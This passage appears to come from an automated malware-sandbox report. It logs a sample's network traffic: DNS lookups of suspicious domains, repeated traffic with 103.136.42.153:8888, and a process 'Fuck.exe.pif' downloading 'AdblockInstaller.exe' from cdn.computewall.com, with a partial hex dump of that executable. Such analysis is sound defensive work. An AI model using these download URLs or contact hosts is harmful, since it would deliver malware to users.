                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024482012 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024498940 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024529934 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024539948 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024555922 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024570942 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024586916 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024602890 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024612904 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024637938 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024719000 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024768114 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024770975 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.024772882 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025599003 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025702000 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025759935 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025775909 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025785923 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025803089 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025823116 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025882959 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025899887 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025909901 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025943041 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.025949001 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026133060 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026135921 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026751041 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026881933 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026896954 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026909113 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026916981 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026932001 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026943922 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.026988983 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.027025938 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.027089119 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.027102947 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.027200937 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.027288914 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.030025005 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.030118942 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.030172110 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.030184031 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.030220032 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.030365944 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.030370951 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.032774925 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.032862902 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.032915115 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.032949924 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.032988071 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.033000946 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.033097029 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.033194065 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.036926985 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037030935 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037049055 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037060976 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037069082 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037080050 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037174940 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037182093 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037189960 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037200928 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037215948 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037229061 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037317991 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037386894 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037398100 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037410021 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037420034 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037480116 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037537098 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037548065 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037558079 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037564993 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037632942 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037636995 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037638903 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037801027 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037818909 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037928104 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037986040 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.037997007 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038003922 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038014889 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038026094 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038049936 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038083076 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038117886 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038131952 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038136005 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038156033 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038176060 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038194895 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038214922 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038228035 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038494110 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038499117 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.038505077 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.040643930 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.040745020 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.040752888 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041003942 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041012049 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041044950 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041059017 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041065931 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041078091 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041121006 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041204929 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041217089 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041224003 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041380882 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041385889 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.041616917 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042500973 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042649031 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042663097 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042674065 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042699099 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042798042 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042810917 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042821884 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042829037 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042839050 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.042872906 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.043083906 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.043090105 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.142484903 CEST4984480192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.150944948 CEST8049844188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.151139975 CEST4984480192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.151438951 CEST4984480192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.159768105 CEST8049844188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Oct 4, 2022 07:09:28.981643915 CEST192.168.11.201.1.1.10xbbd2Standard query (0)UWQEfDCLagTOQundi.UWQEfDCLagTOQundiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.294573069 CEST192.168.11.201.1.1.10x5eadStandard query (0)cdn.computewall.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.453293085 CEST192.168.11.201.1.1.10xc9beStandard query (0)mnh.ajn322bb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:15.969695091 CEST192.168.11.201.1.1.10x1f99Standard query (0)api.joinmassive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.914482117 CEST192.168.11.201.1.1.10xde57Standard query (0)aka.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.290816069 CEST192.168.11.201.1.1.10xcab4Standard query (0)a.dowgmea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.144032955 CEST192.168.11.201.1.1.10x2607Standard query (0)b.dowgmeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.703778982 CEST192.168.11.201.1.1.10x6abStandard query (0)www.mxnzvc.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.112004995 CEST192.168.11.201.1.1.10x714fStandard query (0)xv.yxzgamen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:22.302194118 CEST192.168.11.201.1.1.10x92d0Standard query (0)2jhbdhjfsdf2.monsterA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:22.586395025 CEST192.168.11.201.1.1.10xc204Standard query (0)www.savesucpnys.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:25.757296085 CEST192.168.11.201.1.1.10xa25Standard query (0)g.agametog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:25.757390976 CEST192.168.11.201.1.1.10x8464Standard query (0)g.agametog.com28IN (0x0001)false
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Oct 4, 2022 07:09:28.990983963 CEST1.1.1.1192.168.11.200xbbd2Name error (3)UWQEfDCLagTOQundi.UWQEfDCLagTOQundinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.304734945 CEST1.1.1.1192.168.11.200x5eadNo error (0)cdn.computewall.com172.67.68.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.304734945 CEST1.1.1.1192.168.11.200x5eadNo error (0)cdn.computewall.com104.26.2.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.304734945 CEST1.1.1.1192.168.11.200x5eadNo error (0)cdn.computewall.com104.26.3.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.469897985 CEST1.1.1.1192.168.11.200xc9beNo error (0)mnh.ajn322bb.com104.21.25.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:12.469897985 CEST1.1.1.1192.168.11.200xc9beNo error (0)mnh.ajn322bb.com172.67.134.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.006266117 CEST1.1.1.1192.168.11.200x1f99No error (0)api.joinmassive.comd2l7sw81k13yby.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.006266117 CEST1.1.1.1192.168.11.200x1f99No error (0)d2l7sw81k13yby.cloudfront.net13.32.99.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.006266117 CEST1.1.1.1192.168.11.200x1f99No error (0)d2l7sw81k13yby.cloudfront.net13.32.99.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.006266117 CEST1.1.1.1192.168.11.200x1f99No error (0)d2l7sw81k13yby.cloudfront.net13.32.99.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.006266117 CEST1.1.1.1192.168.11.200x1f99No error (0)d2l7sw81k13yby.cloudfront.net13.32.99.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.923705101 CEST1.1.1.1192.168.11.200xde57No error (0)aka.ms23.79.157.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.467093945 CEST1.1.1.1192.168.11.200xcab4No error (0)a.dowgmea.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.467093945 CEST1.1.1.1192.168.11.200xcab4No error (0)a.dowgmea.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.160456896 CEST1.1.1.1192.168.11.200x2607No error (0)b.dowgmeb.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.160456896 CEST1.1.1.1192.168.11.200x2607No error (0)b.dowgmeb.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.750000000 CEST1.1.1.1192.168.11.200x6abNo error (0)www.mxnzvc.xyz103.136.42.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.131377935 CEST1.1.1.1192.168.11.200x714fNo error (0)xv.yxzgamen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:20.131377935 CEST1.1.1.1192.168.11.200x714fNo error (0)xv.yxzgamen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:22.320930958 CEST1.1.1.1192.168.11.200x92d0No error (0)2jhbdhjfsdf2.monster188.72.236.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:22.862760067 CEST1.1.1.1192.168.11.200xc204No error (0)www.savesucpnys.xyz207.180.199.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:25.767472029 CEST1.1.1.1192.168.11.200xa25No error (0)g.agametog.com34.142.181.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    • cdn.computewall.com
                                                                                                                                                                                                                                    • mnh.ajn322bb.com
                                                                                                                                                                                                                                    • api.joinmassive.com
                                                                                                                                                                                                                                    • aka.ms
                                                                                                                                                                                                                                    • a.dowgmea.com
                                                                                                                                                                                                                                    • b.dowgmeb.com
                                                                                                                                                                                                                                    • 2jhbdhjfsdf2.monster
                                                                                                                                                                                                                                    • cdn.discordapp.com
                                                                                                                                                                                                                                    • cf43570.tmweb.ru
                                                                                                                                                                                                                                    • www.icodeps.com
                                                                                                                                                                                                                                    • iplogger.org
                                                                                                                                                                                                                                    • pp.abcgameabc.com
                                                                                                                                                                                                                                    • 109.206.241.33
                                                                                                                                                                                                                                    • www.mxnzvc.xyz:8888
                                                                                                                                                                                                                                    • xv.yxzgamen.com
                                                                                                                                                                                                                                    • www.savesucpnys.xyz
                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    0192.168.11.2049835172.67.68.80443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC0OUTGET /adblockfast/marketator/windows/AdblockInstaller.exe HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                    Host: cdn.computewall.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:05 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                                                                    Content-Length: 12722472
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    x-amz-id-2: Xy031oasWBLfDKcyC3bnO5PtQmUriRILtzCnmGwXEb7sBPWCk1qzOzoHSwIdy4Eehi0tzQVzw9c=
                                                                                                                                                                                                                                    x-amz-request-id: 566MPHTQ2NWDDZ5R
                                                                                                                                                                                                                                    Last-Modified: Tue, 23 Aug 2022 18:25:03 GMT
                                                                                                                                                                                                                                    ETag: "19b20fc498d366730c470bacab083fe7"
                                                                                                                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                    Age: 4361
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aZ50nK17StMd4uHCi2N5pip9H0grnkOiokiUvxAD6UiIBw0dvd0%2BZlt9Pele3seQjY0QMdbuzcmH4UpZjBK6WzKu1lJyjLlRgrPJc4OpWiLo3P91NBec1Y7co7TKo2u3eih%2FUpc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b68bc3ddd9088-FRA
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1INData Raw: 88 16 00 00 00 50 0b 00 00 18 00 00 00 3c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 37 00 00 00 70 0b 00 00 38 00 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 6d 00 00 00 b0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 36 0f 00 00 00 20 0c 00 00 10 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 30 0c 00 00 02 00 00 00 9c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9a 00 00 00 00 40 0c 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 18 00 00 00 00 50 0c 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: P< `.data7p8T@.bssm.idata6 @.didata0@.edata@@@.tlsP
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC2INData Raw: 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 05 00 0b f4 ca 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 18 7c 4b 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 18 7c 4b 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 18 7c 4b 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74 61 02 00 00 00 10 40 00 09 42 69 67 45 6e 64 69 61 6e 02 00 02 00 09 18 7c 4b 00 06 43 72 65 61 74 65 00 00 40 13 40 00 03 16 b4 10 40 00 04 44 61 74 61 02 00 00 e4 10 40 00 0b 41 53 74 61 72 74 49 6e 64 65 78 02 00 00 00 10 40 00 09 42 69 67 45
                                                                                                                                                                                                                                    Data Ascii: D4@&op_Equality@@@Left@@Right|K&op_Inequality@@@Left@@Right|KEmpty@@|KCreate@@Data@BigEndian|KCreate@@@Data@AStartIndex@BigE
